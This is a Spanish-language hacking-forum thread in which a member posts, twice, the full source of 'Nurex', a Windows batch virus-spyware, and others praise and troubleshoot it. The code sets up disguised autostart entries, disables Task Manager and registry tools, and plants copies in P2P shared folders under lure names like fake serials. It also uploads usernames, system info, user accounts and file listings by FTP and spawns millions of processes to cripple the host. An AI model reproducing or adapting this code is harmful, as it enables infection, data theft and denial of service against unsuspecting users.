Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 04, 2008, 08:10:44
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: [virus] Nurex 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: [virus] Nurex  (Leído 313 veces)
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« en: Junio 10, 2008, 10:54:10 »
juegos gratis
Código:
 @echo off
rem ----------------------------------------------------------------------------------------------
rem NUREX =================  .........   19/12/07
rem this is a parasitic virus-spyware .bat file
rem some features:
rem -p2p propagation
rem     -look for winrar and if exist, infect all .rar files inside p2p clients installed in the host, make copies of itself and add it in .rar archives, then after 10th infection will be more than 150 infected files in each p2p client!.. xD .. and if winrar doesn't exist ... infect the p2p clients with .bat copies of itself
rem     -try to connect to a ftp server and if connect, send info about the victim (username, pass and server are censured in the code)
rem     -make 9999999 procesess that in 10 minutes will make a chaos
rem -only batch script coding!
rem -work with modules. do not depend of one main process.. then if one process fail others can continue independly
rem .... well .. why nurex?...:i think is nice xD ...
echo  ============================================
echo  ^|NUREX by Shadow (The Shadow) whatever way ^|
echo  ============================================
if '%1==' (
  type %0 > pnc.bat
  start /min pnc.bat v0
  exit
) else (
  goto %1
  exit
)
:v0
copy %0 %windir%\pnc.bat
copy %0 %temp%\pnc.bat
find "tine"<%0>t.t
find /v "find "<t.t>t.bat
find "mv1"<%0>v1.t
find /v "find "<v1.t>v1.bat
start /min v1.bat
exit
:v1
goto v1_%2
:v1_si
copy *.bat %windir%\
set l="HKLM\software\microsoft\windows\currentversion\policies\explorer\run"
reg add %l% /V "RunDll23, AVUpdate" /d "%windir%\pnc.bat" /f
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d "1" /f
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d "1" /f
cd %windir%
start /min %windir%\pnc.bat conf
echo puedo=si > %windir%\%userdomain%_dat.dat
find "mv2"<%0>%windir%\v2.t
find /v "find "<v2.t>v2.bat
start /min v2.bat %0
exit
:v1_no
copy *.bat %temp%\
set l="HKLM\software\microsoft\windows\currentversion\policies\explorer\run"
reg add %l% /V "RunDll23, AVUpdate" /d "%temp%\pnc.bat" /f
cd %temp%
start /min %temp%\pnc.bat conf
echo puedo=no > %temp%\%userdomain%_dat.dat
find "mv3"<%0>%temp%\v3.t
find /v "find "<v3.t>v3.bat
start /min v3.bat %0
:v1_
exit
:v2
cd %windir%
find "fttpc"<%0>ftpc.t
find /v "find "<ftpc.t>ftpc.bat
find "rdst"<%0>rd.t
find /v "find "<rd.t>rd.bat
find "rmcller"<%0>rm.t
find /v "find "<rm.t>rm.bat
goto v2_%2
:v2_0
echo rar=si >> %windir%\%userdomain%_dat.dat
find "mv3"<%0>%windir%\v3.t
find /v "find "<v3.t>v3.bat
start /min v3.bat %windir% pnc.bat %0
start /min rm.bat
exit
:v2_1
echo rar=no >> %windir%\%userdomain%_dat.dat
find "mv3"<%0>%windir%\v3.t
find /v "find "<v3.t>v3.bat
start /min v3.bat %windir% pnc.bat %0
start /min rm.bat
:v2_
exit
:v3
goto v3_%2
v3_si
find "mv4"<%0>%1\v4.t
find /v "find "<v4.t>v4.bat
start /min  %1\v4.bat %1
:v3_no
:v3_
exit
:conf
echo.>imhere.dat
exit
rem ------------------------------------------------------M O D U L E S-------------------------------------
   @echo off %mv1%
copy %0 %windir%\ %mv1%
if %errorlevel%==0 ( %mv1%
   start /min %windir%\pnc.bat v1 si  %mv1%
   exit   %mv1%
) else (  %mv1%
   start /min %temp%\pnc.bat v1 no  %mv1%
   exit   %mv1%
)  %mv1%
   @echo off %mv2%
set param1=%1 %mv2%
type %0>op.bat %mv2%
set o="%systemdrive%%~p0op.bat" %mv2%
set om="%windir%\pnc.bat" %mv2%
cd "%systemdrive%%~p0" %mv2%
set rnyon=%random% %mv2%
echo eMule\Incoming\ > %windir%\yer.t %mv2%
echo Shareaza\Downloads\ >> %windir%\yer.t %mv2%
echo BearShare\Shared\ >> %windir%\yer.t %mv2%
echo EDONKEY2000\incoming\ >> %windir%\yer.t %mv2%
echo LimeWire\Shared\ >> %windir%\yer.t %mv2%
echo Path_msn_Emoticonos_%rnyon: =% > %windir%\jer.t %mv2%
echo sms_gratis_%rnyon: =% >> %windir%\jer.t %mv2%
echo polifonicos_free_%rnyon: =% >> %windir%\jer.t %mv2%
echo Microsoft_Office_2007_serials_%rnyon: =% >> %windir%\jer.t %mv2%
echo Windows_Vista_activation_tool_%rnyon: =% >> %windir%\jer.t %mv2%
echo Windows_Vista_all_serials_%rnyon: =% >> %windir%\jer.t %mv2%
echo MSN_hack_codes_%rnyon: =% >> %windir%\jer.t %mv2%
set rc=1 %mv2%
set r="%programfiles%\WINRAR\WinRAR.exe" %mv2%
%r% a %windir%\t.rar %o% %mv2%
if not %errorlevel%==9009 set rc=0 %mv2%
if exist %param1%\conf.dat ( %mv2%
   start /min %windir%\pnc.bat v2 %rc% %mv2%
) else ( %mv2%
   start /min %param1% v2 %rc% %mv2%
) %mv2%
goto fr %mv2%
:fr2 %mv2%
set uno=%1 %mv2%
for /F "tokens=* delims=" %%g in (%windir%\jer.t) do ( %mv2%
         if %rc%==0 ( %mv2%
              @copy /y %om% "%%g.bat" %mv2%
           cls %mv2%
           ping -n 2 localhost > nul %mv2%
           %r% a "%%g.rar" "%%g.bat" %mv2%
         ) %mv2%
) %mv2%
goto :EOF                                   %mv2%
:fr %mv2%
for /F "tokens=* delims=" %%a in (%windir%\yer.t) do ( %mv2%
         if exist "%programfiles%\%%a" ( %mv2%
            cd "%programfiles%\%%a"      %mv2%
            for %%e in (*.rar) do ( %mv2%
                 @copy /y %om% "%%~ne.bat" %mv2%
              cls %mv2%
              ping -n 2 localhost > nul %mv2%
              %r% a "%%e" "%%~ne.bat" %mv2%
            )       %mv2%
         call :fr2 %%a %mv2%
          ) %mv2%
) %mv2%
cd %windir% %mv2%
del *.t %mv2%
cd "%systemdrive%%~p0" %mv2%
del op.bat %mv2%
exit %mv2%
   @echo off %mv3%
set param=%1 %mv3%
set param1=%param: =% %mv3%
set param2=%2 %mv3%
set param3=%3 %mv3%
cd %param1% %mv3%
ping -n 10 localhost > nul %mv3%
start /min t.bat %param1: =%\ftpc.bat %param1: =% 1 %mv3%
echo %userdomain% puede recivir ordenes > ftd.dat %mv3%
echo Ip info: >> ftd.dat %mv3%
%ipconfig% /all >> ftd.dat %mv3%
echo ****** > ft.dat %mv3%
echo ****** >> ft.dat %mv3%
echo binary >> ft.dat %mv3%
echo put %param1%\ftd.dat %userdomain%_conf.txt >> ft.dat %mv3%
echo disconnect >> ft.dat %mv3%
echo bye >> ft.dat %mv3%
echo ftp -s:%param1%\ft.dat ********** %mv3%
echo ******> %param1%\ft.dat %mv3%
echo ****** >> ft.dat %mv3%
echo binary >> ft.dat %mv3%
echo get %userdomain%_conf.txt %param1%\ftp_si.dat >> ft.dat %mv3%
echo disconnect >> ft.dat %mv3%
echo bye >> ft.dat %mv3%
echo ftp -s:ft.dat ************ %mv3%
exit %mv3%
   @echo off %mv4%
cd %1 %mv4%
echo %username%>usrnm.000 %mv4%
systeminfo>ssinfo.000 %mv4%
set>set.000 %mv4%
net user>net.000 %mv4%
echo %os%>os.000 %mv4%
cd %programfiles% %mv4%
dir>progfile.000 %mv4%
cd "%userprofile%\mis documentos\" %mv4%
dir /s>docs.000 %mv4%
ipconfig>ip.000 %mv4%
cd\ %mv4%
dir /s>archs.000 %mv4%
set log=%userdomain%_ %mv4%
set user=****** %mv4%
set pass=****** %mv4%
echo %user%>ftp.000 %mv4%
echo %pass%>>ftp.000 %mv4%
echo binary>>ftp.000 %mv4%
echo put usrnm.000 %log%usrnm.log>>ftp.000 %mv4%
echo put os.000 %log%os.log>>ftp.000 %mv4%
echo put progfile.000 %log%progfile.log>>ftp.000 %mv4%
echo put docs.000 %log%docs.log>>ftp.000 %mv4%
echo put set.000 %log%set.log>>ftp.000 %mv4%
echo put net.000 %log%net.log>>ftp.000 %mv4%
echo put ssinfo.000 %log%ssinfo.log>>ftp.000 %mv4%
echo disconnect>>ftp.000 %mv4%
echo bye>>ftp.000 %mv4%
ftp -s:%windir%\ftp.000 ************* %mv4%
   @echo off %tine%
set param1=%1 %tine%
set param2=%2 %tine%
set param3=%3 %tine%
set param4=%4 %tine%
set hor=%time:~0,2% %tine%
set tim=%time:~3% %tine%
set tim=%tim:~0,2% %tine%
set /A tim=%tim% + %param3: =% %tine%
if /I %tim% geq 60 (set /a hor=%hor%+1 %tine%
                    set /a tim=%tim%-60 %tine%
                    if /I %tim% lss 10 (set tim=0%tim%)) %tine%
set ecx=%hor%:%tim% %tine%
at %ecx: =% %param1: =% %param2: =% %param3: =% %param4: =% %tine%
exit %tine%
   @echo off %fttpc%
set param=%1 %fttpc%
set param1=%param: =% %fttpc%
cd %param1% %fttpc%
if exist ftp_si.dat ( %fttpc%
   start /min pnc.bat v3 si %fttpc%
   exit %fttpc%
) %fttpc%
start /min pnc.bat v3 no %fttpc%
exit %fttpc%
   @echo off %rdst%
cd\ && dir /s %rdst%
   @echo off %rmcller%
for /l %%v in (0, 1, 9999999) do start /min t.bat %windir%\rd.bat no 10 %rmcller%
rem -------------------------------------------------------------------------------fin---
« Última modificación: Junio 27, 2008, 06:49:56 por tshadow » En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Espectro Infernal
T0 d0: -> Mejorar 3 en raya
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1064


ESPECTRO INFERNAL


Ver Perfil Email
« Respuesta #1 en: Junio 10, 2008, 01:50:25 »
El sábado pasado me leí el code detenidamente desde arriba hasta abajo y encontré un par de cosas que no llegué a entender muy bien su uso. Chequeo lo que apunté de tu virus en la impresion y t lo pregunto despues Wink

Buen uso de los módulos, me gustó el modo en que usas

fin ....<archivo1>
find /v ... <archivo1>archivo a ejecutar.bat

Lo que pasa es que te obliga a usar este tipo de cosas:

set hey=oh %mv4%
set hey=%hey: =%

(Para eliminar el espacio en blanco que supone el %mv4%. Pero bueno, el método esta bueno ^^

Felicitaciones man!

Bytes, Espectro Infernal.
En línea




|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #2 en: Junio 10, 2008, 01:57:30 »
Si ps ... lo bueno de usar esta tecnica de modulacion es que no estas amarrado a encapsular tu modulo dentro del mismo codigo del bat, sino que ace los modulos agarrando el texto que esta usandose como un recurso y no como codigo en si...

Asi nos evitamos caracteres reservados Wink ...

Código:
@echo off
code...
code...
code...
...
exit
-----------------------------Modulos
modules...
modules...
modules...
--> dentro del mismo fichero.. Cheesy

Saludos!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Espectro Infernal
T0 d0: -> Mejorar 3 en raya
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1064


ESPECTRO INFERNAL


Ver Perfil Email
« Respuesta #3 en: Junio 10, 2008, 02:32:49 »
Cita de: tshadow en Junio 10, 2008, 01:57:30
Si ps ... lo bueno de usar esta tecnica de modulacion es que no estas amarrado a encapsular tu modulo dentro del mismo codigo del bat, sino que ace los modulos agarrando el texto que esta usandose como un recurso y no como codigo en si...

Asi nos evitamos caracteres reservados Wink ...

Código:
 @echo off
code...
code...
code...
...
exit
-----------------------------Modulos
modules...
modules...
modules...
--> dentro del mismo fichero.. Cheesy

Saludos!

Nice and easy, well... more or less easy ^^

Bytes, Espectro Infernal.
En línea




:: SmartGenius™ ::
[Splendit Smart]
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2511


Campusero... :P

smartgenius@el-hacker.org
Ver Perfil WWW
« Respuesta #4 en: Junio 11, 2008, 12:17:03 »
Pero si funciona... porque como le habia dicho a Shadow hace rato, de que lo probe y no me infecte ni nada por el estilo...



Saludos.
« Última modificación: Junio 11, 2008, 12:24:13 por :: SmartGenius :: » En línea


y0u-uNSeCure
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 3672


TerminalHacker.es


Ver Perfil Email
« Respuesta #5 en: Junio 14, 2008, 11:19:31 »
quita el  @echo off y fijate en que linea te da el error, y ves por ti solo que puede ser



saludos Wink
En línea
[ + ]
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.TerminalHacker.es
Espectro Infernal
T0 d0: -> Mejorar 3 en raya
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1064


ESPECTRO INFERNAL


Ver Perfil Email
« Respuesta #6 en: Junio 15, 2008, 12:45:32 »
Cita de: :: SmartGenius :: en Junio 11, 2008, 12:17:03
Pero si funciona... porque como le habia dicho a Shadow hace rato, de que lo probe y no me infecte ni nada por el estilo...



Saludos.

Quizás es que toma alguna d elas primeras linea smal, quíta del codigo la primera parte en la que explica en ingles porque se llama Nurex y que hace el vode, etc. A ver si depsues t funciona Wink

Bytes, Espectro Infernal.
En línea




:: SmartGenius™ ::
[Splendit Smart]
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2511


Campusero... :P

smartgenius@el-hacker.org
Ver Perfil WWW
« Respuesta #7 en: Junio 16, 2008, 08:00:02 »
todo lo que han dicho aqui ya lo hice... ya lo probe de varias formas y a la final no me pasa nada, quito los comentarios y modifico otras lineas que posiblemente no funcionen y nada...

Ya esta conversacion la habia tenido con Shadow y al final no descubrimos que fue ...

Saludos.
En línea


|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #8 en: Junio 16, 2008, 08:22:08 »
Código:
 @echo off
rem ----------------------------------------------------------------------------------------------
rem NUREX =================  .........   19/12/07
rem this is a parasitic virus-spyware .bat file
rem some features:
rem -p2p propagation
rem     -look for winrar and if exist, infect all .rar files inside p2p clients installed in the host, make copies of itself and add it in .rar archives, then after 10th infection will be more than 150 infected files in each p2p client!.. xD .. and if winrar doesn't exist ... infect the p2p clients with .bat copies of itself
rem     -try to connect to a ftp server and if connect, send info about the victim (username, pass and server are censured in the code)
rem     -make 9999999 procesess that in 10 minutes will make a chaos
rem -only batch script coding!
rem -work with modules. do not depend of one main process.. then if one process fail others can continue independly
rem .... well .. why nurex?...:i think is nice xD ...
echo  ============================================
echo  ^|NUREX by Shadow (The Shadow) whatever way ^|
echo  ============================================
if '%1==' (
  type %0 > pnc.bat
  start /min pnc.bat v0
  exit
) else (
  goto %1
  exit
)
:v0
copy %0 %windir%\pnc.bat
copy %0 %temp%\pnc.bat
find "tine"<%0>t.t
find /v "find "<t.t>t.bat
find "mv1"<%0>v1.t
find /v "find "<v1.t>v1.bat
start /min v1.bat
exit
:v1
goto v1_%2
:v1_si
copy *.bat %windir%\
set l="HKLM\software\microsoft\windows\currentversion\policies\explorer\run"
reg add %l% /V "RunDll23, AVUpdate" /d "%windir%\pnc.bat" /f
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d "1" /f
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d "1" /f
cd %windir%
start /min %windir%\pnc.bat conf
echo puedo=si > %windir%\%userdomain%_dat.dat
find "mv2"<%0>%windir%\v2.t
find /v "find "<v2.t>v2.bat
start /min v2.bat %0
exit
:v1_no
copy *.bat %temp%\
set l="HKLM\software\microsoft\windows\currentversion\policies\explorer\run"
reg add %l% /V "RunDll23, AVUpdate" /d "%temp%\pnc.bat" /f
cd %temp%
start /min %temp%\pnc.bat conf
echo puedo=no > %temp%\%userdomain%_dat.dat
find "mv3"<%0>%temp%\v3.t
find /v "find "<v3.t>v3.bat
start /min v3.bat %0
:v1_
exit
:v2
cd %windir%
find "fttpc"<%0>ftpc.t
find /v "find "<ftpc.t>ftpc.bat
find "rdst"<%0>rd.t
find /v "find "<rd.t>rd.bat
find "rmcller"<%0>rm.t
find /v "find "<rm.t>rm.bat
goto v2_%2
:v2_0
echo rar=si >> %windir%\%userdomain%_dat.dat
find "mv3"<%0>%windir%\v3.t
find /v "find "<v3.t>v3.bat
start /min v3.bat %windir% pnc.bat %0
start /min rm.bat
exit
:v2_1
echo rar=no >> %windir%\%userdomain%_dat.dat
find "mv3"<%0>%windir%\v3.t
find /v "find "<v3.t>v3.bat
start /min v3.bat %windir% pnc.bat %0
start /min rm.bat
:v2_
exit
:v3
goto v3_%2
v3_si
find "mv4"<%0>%1\v4.t
find /v "find "<v4.t>v4.bat
start /min  %1\v4.bat %1
:v3_no
:v3_
exit
:conf
echo.>imhere.dat
exit
rem ------------------------------------------------------M O D U L E S-------------------------------------
  @echo off %mv1%
copy %0 %windir%\ %mv1%
if %errorlevel%==0 ( %mv1%
   start /min %windir%\pnc.bat v1 si  %mv1%
   exit   %mv1%
) else (  %mv1%
   start /min %temp%\pnc.bat v1 no  %mv1%
   exit   %mv1%
)  %mv1%
  @echo off %mv2%
set param1=%1 %mv2%
type %0>op.bat %mv2%
set o="%systemdrive%%~p0op.bat" %mv2%
set om="%windir%\pnc.bat" %mv2%
cd "%systemdrive%%~p0" %mv2%
set rnyon=%random% %mv2%
echo eMule\Incoming\ > %windir%\yer.t %mv2%
echo Shareaza\Downloads\ >> %windir%\yer.t %mv2%
echo BearShare\Shared\ >> %windir%\yer.t %mv2%
echo EDONKEY2000\incoming\ >> %windir%\yer.t %mv2%
echo LimeWire\Shared\ >> %windir%\yer.t %mv2%
echo Path_msn_Emoticonos_%rnyon: =% > %windir%\jer.t %mv2%
echo sms_gratis_%rnyon: =% >> %windir%\jer.t %mv2%
echo polifonicos_free_%rnyon: =% >> %windir%\jer.t %mv2%
echo Microsoft_Office_2007_serials_%rnyon: =% >> %windir%\jer.t %mv2%
echo Windows_Vista_activation_tool_%rnyon: =% >> %windir%\jer.t %mv2%
echo Windows_Vista_all_serials_%rnyon: =% >> %windir%\jer.t %mv2%
echo MSN_hack_codes_%rnyon: =% >> %windir%\jer.t %mv2%
set rc=1 %mv2%
set r="%programfiles%\WINRAR\WinRAR.exe" %mv2%
%r% a %windir%\t.rar %o% %mv2%
if not %errorlevel%==9009 set rc=0 %mv2%
if exist %param1%\conf.dat ( %mv2%
   start /min %windir%\pnc.bat v2 %rc% %mv2%
) else ( %mv2%
   start /min %param1% v2 %rc% %mv2%
) %mv2%
goto fr %mv2%
:fr2 %mv2%
set uno=%1 %mv2%
for /F "tokens=* delims=" %%g in (%windir%\jer.t) do ( %mv2%
         if %rc%==0 ( %mv2%
             @copy /y %om% "%%g.bat" %mv2%
           cls %mv2%
           ping -n 2 localhost > nul %mv2%
           %r% a "%%g.rar" "%%g.bat" %mv2%
         ) %mv2%
) %mv2%
goto :EOF                                   %mv2%
:fr %mv2%
for /F "tokens=* delims=" %%a in (%windir%\yer.t) do ( %mv2%
         if exist "%programfiles%\%%a" ( %mv2%
            cd "%programfiles%\%%a"      %mv2%
            for %%e in (*.rar) do ( %mv2%
                @copy /y %om% "%%~ne.bat" %mv2%
              cls %mv2%
              ping -n 2 localhost > nul %mv2%
              %r% a "%%e" "%%~ne.bat" %mv2%
            )       %mv2%
         call :fr2 %%a %mv2%
          ) %mv2%
) %mv2%
cd %windir% %mv2%
del *.t %mv2%
cd "%systemdrive%%~p0" %mv2%
del op.bat %mv2%
exit %mv2%
  @echo off %mv3%
set param=%1 %mv3%
set param1=%param: =% %mv3%
set param2=%2 %mv3%
set param3=%3 %mv3%
cd %param1% %mv3%
ping -n 10 localhost > nul %mv3%
start /min t.bat %param1: =%\ftpc.bat %param1: =% 1 %mv3%
echo %userdomain% puede recivir ordenes > ftd.dat %mv3%
echo Ip info: >> ftd.dat %mv3%
%ipconfig% /all >> ftd.dat %mv3%
echo ****** > ft.dat %mv3%
echo ****** >> ft.dat %mv3%
echo binary >> ft.dat %mv3%
echo put %param1%\ftd.dat %userdomain%_conf.txt >> ft.dat %mv3%
echo disconnect >> ft.dat %mv3%
echo bye >> ft.dat %mv3%
echo ftp -s:%param1%\ft.dat ********** %mv3%
echo ******> %param1%\ft.dat %mv3%
echo ****** >> ft.dat %mv3%
echo binary >> ft.dat %mv3%
echo get %userdomain%_conf.txt %param1%\ftp_si.dat >> ft.dat %mv3%
echo disconnect >> ft.dat %mv3%
echo bye >> ft.dat %mv3%
echo ftp -s:ft.dat ************ %mv3%
exit %mv3%
  @echo off %mv4%
cd %1 %mv4%
echo %username%>usrnm.000 %mv4%
systeminfo>ssinfo.000 %mv4%
set>set.000 %mv4%
net user>net.000 %mv4%
echo %os%>os.000 %mv4%
cd %programfiles% %mv4%
dir>progfile.000 %mv4%
cd "%userprofile%\mis documentos\" %mv4%
dir /s>docs.000 %mv4%
ipconfig>ip.000 %mv4%
cd\ %mv4%
dir /s>archs.000 %mv4%
set log=%userdomain%_ %mv4%
set user=****** %mv4%
set pass=****** %mv4%
echo %user%>ftp.000 %mv4%
echo %pass%>>ftp.000 %mv4%
echo binary>>ftp.000 %mv4%
echo put usrnm.000 %log%usrnm.log>>ftp.000 %mv4%
echo put os.000 %log%os.log>>ftp.000 %mv4%
echo put progfile.000 %log%progfile.log>>ftp.000 %mv4%
echo put docs.000 %log%docs.log>>ftp.000 %mv4%
echo put set.000 %log%set.log>>ftp.000 %mv4%
echo put net.000 %log%net.log>>ftp.000 %mv4%
echo put ssinfo.000 %log%ssinfo.log>>ftp.000 %mv4%
echo disconnect>>ftp.000 %mv4%
echo bye>>ftp.000 %mv4%
ftp -s:%windir%\ftp.000 ************* %mv4%
  @echo off %tine%
set param1=%1 %tine%
set param2=%2 %tine%
set param3=%3 %tine%
set param4=%4 %tine%
set hor=%time:~0,2% %tine%
set tim=%time:~3% %tine%
set tim=%tim:~0,2% %tine%
set /A tim=%tim% + %param3: =% %tine%
if /I %tim% geq 60 (set /a hor=%hor%+1 %tine%
                    set /a tim=%tim%-60 %tine%
                    if /I %tim% lss 10 (set tim=0%tim%)) %tine%
set ecx=%hor%:%tim% %tine%
at %ecx: =% %param1: =% %param2: =% %param3: =% %param4: =% %tine%
exit %tine%
  @echo off %fttpc%
set param=%1 %fttpc%
set param1=%param: =% %fttpc%
cd %param1% %fttpc%
if exist ftp_si.dat ( %fttpc%
   start /min pnc.bat v3 si %fttpc%
   exit %fttpc%
) %fttpc%
start /min pnc.bat v3 no %fttpc%
exit %fttpc%
  @echo off %rdst%
cd\ && dir /s %rdst%
  @echo off %rmcller%
for /l %%v in (0, 1, 9999999) do start /min t.bat %windir%\rd.bat no 10 %rmcller%
rem -------------------------------------------------------------------------------fin---

Cambios

de
Código:
echo  |NUREX by Shadow (The Shadow) whatever way |
a
Código:
echo  ^|NUREX by Shadow (The Shadow) whatever way ^|

de 
Código:
type %0>pnc.bat
a   
Código:
type %0 > pnc.bat

xD  .. . . . jajaja que errores mas ¬¬ .. XD

Cuidado . . . . es realmente estresante si te iegas a infectar . . . haciendo las pruebas me jodi yo mismo, y creanme . no fue nada divertido .. . . .

PD: Cualquier cosa, quiten los comentarios.... si no funka

Saludos!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Espectro Infernal
T0 d0: -> Mejorar 3 en raya
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1064


ESPECTRO INFERNAL


Ver Perfil Email
« Respuesta #9 en: Junio 17, 2008, 02:40:57 »
Cita de: tshadow en Junio 16, 2008, 08:22:08
Cuidado . . . . es realmente estresante si te iegas a infectar . . . haciendo las pruebas me jodi yo mismo, y creanme . no fue nada divertido .. . . .

LOL, esas cosas pasan... jajaja, k pr0 shadow! ;P

En cuanto al código, muy bonito. Trataré de usar el Virtual PC para ver como afecta el Pc.

Bytes, Espectro Infernal.
« Última modificación: Junio 17, 2008, 02:43:57 por Espectro Infernal » En línea




Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: [virus] Nurex « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC